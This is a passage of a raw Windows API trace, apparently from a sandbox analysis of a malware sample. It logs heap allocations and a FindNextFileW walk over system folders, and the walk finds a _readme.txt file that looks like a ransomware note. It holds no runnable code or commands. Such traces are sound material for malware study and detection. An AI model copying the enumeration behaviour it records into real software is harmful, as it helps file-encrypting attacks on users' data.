RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8ac8 [0227.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0227.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7d8 | out: hHeap=0x630000) returned 1 [0227.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0227.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0227.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0227.373] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0227.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0227.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0227.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb30 [0227.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0227.373] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x20c30760, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x20c30760, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0227.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7d8 [0227.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.373] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0227.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x6a3b30 [0227.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0227.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed878 [0227.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8a0 [0227.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0227.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8c8 [0227.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0227.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed828 | out: hHeap=0x630000) returned 1 [0227.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0227.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edb30 | out: hHeap=0x630000) returned 1 [0227.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7d8 | out: hHeap=0x630000) returned 1 [0227.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0227.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7d8 [0227.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.374] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0227.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7340 | out: hHeap=0x630000) returned 1 [0227.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.375] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1daa5d80, ftCreationTime.dwHighDateTime=0x1d5fd35, ftLastAccessTime.dwLowDateTime=0x1daa5d80, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x1daa5d80, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.375] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.375] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x31c0d08 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb30 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.376] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8f0 [0227.376] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed918 [0227.376] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edba0 [0227.376] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edbd8 [0227.376] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed940 [0227.376] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.376] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0227.376] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.376] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0227.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed878 | out: hHeap=0x630000) returned 1 [0227.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed8a0 | out: hHeap=0x630000) returned 1 [0227.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edb68 | out: hHeap=0x630000) returned 1 [0227.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed8c8 | out: hHeap=0x630000) returned 1 [0227.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7d8 | out: hHeap=0x630000) returned 1 [0227.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0227.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed828 | out: hHeap=0x630000) returned 1 [0227.377] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.377] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a3b30 | out: hHeap=0x630000) returned 1 [0227.377] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.377] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.377] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.377] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0x7bfad5e0, ftCreationTime.dwHighDateTime=0x1d5fd35, ftLastAccessTime.dwLowDateTime=0x7bfad5e0, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x7bfad5e0, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0227.377] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0x7bfad5e0, ftCreationTime.dwHighDateTime=0x1d5fd35, ftLastAccessTime.dwLowDateTime=0x7bfad5e0, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x7bfad5e0, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0227.377] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.377] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.377] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.377] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.377] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.377] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.377] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.377] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edb68 | out: hHeap=0x630000) returned 1 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.380] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 